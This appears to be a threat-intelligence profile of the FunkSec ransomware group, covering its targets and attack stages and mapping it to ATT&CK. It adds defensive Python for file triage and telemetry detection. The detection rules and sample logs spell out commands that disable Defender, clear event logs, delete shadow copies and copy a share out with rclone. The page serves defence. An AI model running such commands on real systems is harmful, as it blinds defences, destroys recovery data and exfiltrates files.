FunkSec

FunkSec represents a new wave of AI-assisted ransomware groups, blending cybercrime with hacktivism. While their technical sophistication is questionable, their tactics and public visibility make them a notable threat. Security teams should monitor AI-driven malware trends and prepare for ransomware attacks leveraging automation and deception tactics.


FunkSec's Background

FunkSec is a ransomware group that emerged in late 2024, rapidly gaining notoriety for its high number of publicly claimed victims. Unlike other established ransomware gangs, FunkSec appears to be a relatively new and independent operation, with no known ties to previous ransomware families. The group utilizes double extortion tactics, combining data encryption with data theft to pressure victims into paying ransoms.

A key characteristic of FunkSec is its AI-assisted malware development, allowing even inexperienced actors to rapidly create and iterate on malicious tools. The group appears to operate at the intersection of hacktivism and cybercrime, making it difficult to determine their true motivations. Some of their leaked datasets were found to be recycled from previous hacktivist campaigns, casting doubt on the authenticity of their disclosures.

While FunkSec presents itself as a sophisticated ransomware-as-a-service (RaaS) operation, security researchers have identified multiple signs indicating that the group's technical expertise is limited. Most of their activities seem to be driven by a desire for notoriety rather than financial gain, as evidenced by their low ransom demands and public promotional efforts on cybercrime forums.

Source: Checkpoint

Targets

FunkSec's Targets

Targeted Countries

The majority of FunkSec's claimed victims have been from India and the United States, with additional attacks targeting European and Middle Eastern organizations. Their alignment with the "Free Palestine" movement suggests a possible geopolitical motivation, though this may be more about branding than actual political intent.

Targeted Industries

FunkSec does not appear to focus on a single industry but has attacked government institutions, healthcare, financial services, and technology companies. The group's ransomware-as-a-service (RaaS) model allows multiple affiliates to use their tools, broadening their scope of potential victims. Some targeted industries align with hacktivist motives, particularly government agencies and infrastructure.

Image source: PCrisk


Notable Victims

An estimated 138 organizations have fallen prey to FunkSec attacks.

Attack Method

FunkSec's Attack Method

Initial Access

FunkSec gains access through phishing emails, credential stuffing, and exploiting unpatched vulnerabilities in exposed systems. They also leverage stolen credentials found in dark web forums.

Privilege Escalation

The group attempts to escalate privileges using credential theft techniques, token manipulation, and exploiting misconfigurations in Windows environments.

Defense Evasion

FunkSec disables Windows Defender, event logging, and PowerShell security features to avoid detection. Their ransomware is compiled in Rust, which can make analysis and detection more difficult.

Credential Access

They deploy keyloggers and password-scraping tools like funkgenerate, which gathers credentials from compromised systems and websites.

Discovery

FunkSec scans infected networks to locate valuable files and determine the most critical assets to encrypt.

Lateral Movement

They use HVNC (hidden virtual network computing) tools and remote desktop exploits to move across compromised networks.

Collection

The group exfiltrates sensitive files using custom Python scripts and standard tools like Rclone before encrypting the victim’s data.

Execution

The Rust-based ransomware encrypts files with ChaCha20, appends the “.funksec” extension, and drops a ransom note.
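The encryption step described above is the first thing a responder sees on disk. The following Python script is an added example written for this page, not FunkSec's code and not from the source profile. It applies two cheap checks over a file set: the “.funksec” extension the profile names, and byte entropy close to 8 bits per byte, which is what ChaCha20 output (or any sound stream cipher output) looks like. The sample files are constructed in memory; the entropy threshold, the minimum file size and the per-directory ratio are assumptions chosen for this example.

```python
"""Triage a file set for signs of FunkSec-style encryption.

Added example, not from the source profile and not FunkSec code. Two checks:
the ".funksec" extension the profile names, and byte entropy near 8 bits,
which is how ChaCha20 ciphertext looks. Sample files are constructed; the
threshold, minimum size and directory ratio are assumptions for this example.
"""
import math
import random
from collections import Counter

RANSOM_EXT = ".funksec"        # extension appended by the ransomware, per the profile
ENTROPY_THRESHOLD = 7.5        # bits per byte; assumed cut-off for "looks encrypted"
MIN_SIZE = 256                 # tiny files give unreliable entropy estimates (assumption)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(path: str, data: bytes) -> list[str]:
    """Return the reasons a file looks encrypted (empty list if it looks normal)."""
    reasons = []
    if path.lower().endswith(RANSOM_EXT):
        reasons.append("ransom extension")
    if len(data) >= MIN_SIZE and shannon_entropy(data) >= ENTROPY_THRESHOLD:
        reasons.append("high entropy")
    return reasons


def triage(files: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each suspicious path to its reasons; clean files are omitted."""
    return {p: r for p, d in files.items() if (r := classify(p, d))}


def directories_under_encryption(files: dict[str, bytes], min_ratio: float = 0.5) -> list[str]:
    """Directories in which at least min_ratio of the files carry the ransom extension.

    Only the extension counts here: entropy alone also fires on legitimate
    compressed or random data, so it is a corroborating signal, not a verdict.
    """
    total, flagged = Counter(), Counter()
    suspicious = triage(files)
    for path in files:
        directory = path.rsplit("/", 1)[0]
        total[directory] += 1
        if "ransom extension" in suspicious.get(path, []):
            flagged[directory] += 1
    return sorted(d for d in total if flagged[d] / total[d] >= min_ratio)


# Constructed sample set: pseudo-random bytes stand in for ChaCha20 output.
_rng = random.Random(7)
SAMPLE_FILES = {
    "finance/q3-report.xlsx.funksec": _rng.randbytes(4096),
    "finance/budget.docx.funksec": _rng.randbytes(4096),
    "finance/readme.txt": b"Quarterly figures are in the spreadsheet.\n" * 20,
    "hr/handbook.pdf": b"%PDF-1.4\n" + b"Employee handbook, section 1. " * 40,
    "hr/offer.docx": b"Dear candidate, we are pleased to offer you the position. " * 20,
    "tmp/cache.bin": _rng.randbytes(2048),   # benign random data: entropy fires, extension does not
}

if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(reasons)}")
    print("directories under encryption:", directories_under_encryption(SAMPLE_FILES))
```

Run against a snapshot of a share, the two `.funksec` files are flagged on both signals, while `tmp/cache.bin` is flagged on entropy only and the `hr` directory stays clean. That split is the point of keeping the two signals separate: the extension is the definitive indicator for this family, entropy catches files the ransomware may have renamed differently, and neither should be read without the other.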

Exfiltration

Stolen data is uploaded to FunkSec’s dark web leak site, where it is either publicly released or sold to third parties.

Impact

The ransomware deletes shadow copies, disrupts operations by terminating processes, and changes system settings (e.g., blacking out the desktop background).
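The Defense Evasion, Exfiltration and Impact behaviours described above (Defender and event logging disabled, Rclone transfers, shadow copies deleted) all leave process-creation events behind. The following Python detector is an added example for this page, not part of the source profile and not FunkSec tooling. It keys a small rule set to the ATT&CK technique IDs the profile maps and runs it over constructed Sysmon-style process-creation lines; the line format, field names, hostnames and command lines are assumptions made for this example.

```python
"""Flag FunkSec-style host activity in process-creation telemetry.

Added example, not from the source profile and not FunkSec tooling. Rules are
keyed to the techniques the profile maps (T1562 Impair Defenses, T1070
Indicator Removal, T1490 Inhibit System Recovery, T1567 Exfiltration Over Web
Service) and run over constructed Sysmon-style lines. The line format, field
names, hosts and command lines are assumptions for this example.
"""
import re
from collections import defaultdict

# One rule per behaviour the profile describes: (technique, detail, pattern).
# Matching is case-insensitive because casing varies in real telemetry.
RULES = [
    ("T1562", "Defender real-time monitoring disabled",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+(\$true|1)\b", re.I)),
    ("T1562", "Defender or event-log service stopped",
     re.compile(r"\b(sc(\.exe)?\s+stop\s+windefend|net(\.exe)?\s+stop\s+eventlog)\b", re.I)),
    ("T1070", "Windows event log cleared",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("T1490", "Volume shadow copies deleted",
     re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", re.I)),
    ("T1490", "Boot recovery disabled",
     re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("T1567", "Rclone transfer to a remote",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
]

# Constructed line format: ISO timestamp, key=value fields, quoted cmd last.
EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+eid=(?P<eid>\d+)\s+'
    r'user=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd="(?P<cmd>.*)"$'
)


def parse_event(line: str):
    """Parse one telemetry line into a dict, or None if it is not in the expected shape."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(cmd: str):
    """All (technique, detail) pairs whose pattern matches the command line."""
    return [(tid, detail) for tid, detail, rx in RULES if rx.search(cmd)]


def scan(lines):
    """One finding per (process-creation event, matching rule)."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["eid"] != "1":      # Sysmon Event ID 1 = process creation
            continue
        for tid, detail in match_rules(ev["cmd"]):
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "technique": tid, "detail": detail, "cmd": ev["cmd"]})
    return findings


def summarize(findings):
    """Distinct technique IDs observed per host."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["technique"])
    return dict(per_host)


def staged_hosts(findings, min_techniques: int = 2):
    """Hosts showing several distinct techniques: the staging pattern the profile
    describes (defenses impaired, recovery inhibited) before encryption lands."""
    return sorted(h for h, t in summarize(findings).items() if len(t) >= min_techniques)


# Constructed sample telemetry; hosts, users and paths are invented for this example.
SAMPLE_EVENTS = [
    '2025-01-15T10:00:01Z host=WS01 eid=1 user=CORP\\jdoe parent=explorer.exe cmd="notepad.exe C:\\Users\\jdoe\\notes.txt"',
    '2025-01-15T10:02:13Z host=WS01 eid=1 user=CORP\\jdoe parent=powershell.exe cmd="powershell.exe -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"',
    '2025-01-15T10:02:40Z host=WS01 eid=1 user=CORP\\jdoe parent=cmd.exe cmd="wevtutil.exe cl Security"',
    '2025-01-15T10:03:05Z host=WS01 eid=1 user=CORP\\jdoe parent=cmd.exe cmd="vssadmin.exe delete shadows /all /quiet"',
    '2025-01-15T10:05:22Z host=FS02 eid=1 user=CORP\\svc_backup parent=cmd.exe cmd="rclone.exe copy D:\\Shares\\Finance remote:drop --transfers 8"',
    '2025-01-15T10:06:00Z host=FS02 eid=1 user=CORP\\svc_backup parent=services.exe cmd="C:\\Windows\\System32\\svchost.exe -k netsvcs"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f'{f["ts"]} {f["host"]} {f["technique"]} {f["detail"]}: {f["cmd"]}')
    print("hosts in staging pattern:", staged_hosts(hits))
```

On the sample, WS01 accumulates T1562, T1070 and T1490 within a few minutes, which is the sequence worth paging on; FS02 shows only the Rclone transfer, which on its own is a lower-confidence signal and should be corroborated against the account's normal backup activity before it is treated as T1567.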

MITRE ATT&CK Mapping

FunkSec's TTPs

TA0001: Initial Access
    T1566  Phishing
    T1190  Exploit Public-Facing Application
TA0002: Execution
    T1204  User Execution
TA0003: Persistence
    (no techniques mapped)
TA0004: Privilege Escalation
    T1134  Access Token Manipulation
    T1068  Exploitation for Privilege Escalation
TA0005: Defense Evasion
    T1134  Access Token Manipulation
    T1070  Indicator Removal
    T1562  Impair Defenses
TA0006: Credential Access
    T1110  Brute Force
    T1003  OS Credential Dumping
TA0007: Discovery
    T1082  System Information Discovery
    T1046  Network Service Discovery
TA0008: Lateral Movement
    T1021  Remote Services
TA0009: Collection
    (no techniques mapped)
TA0011: Command and Control
    (no techniques mapped)
TA0010: Exfiltration
    T1567  Exfiltration Over Web Service
TA0040: Impact
    T1490  Inhibit System Recovery
    T1486  Data Encrypted for Impact

FAQs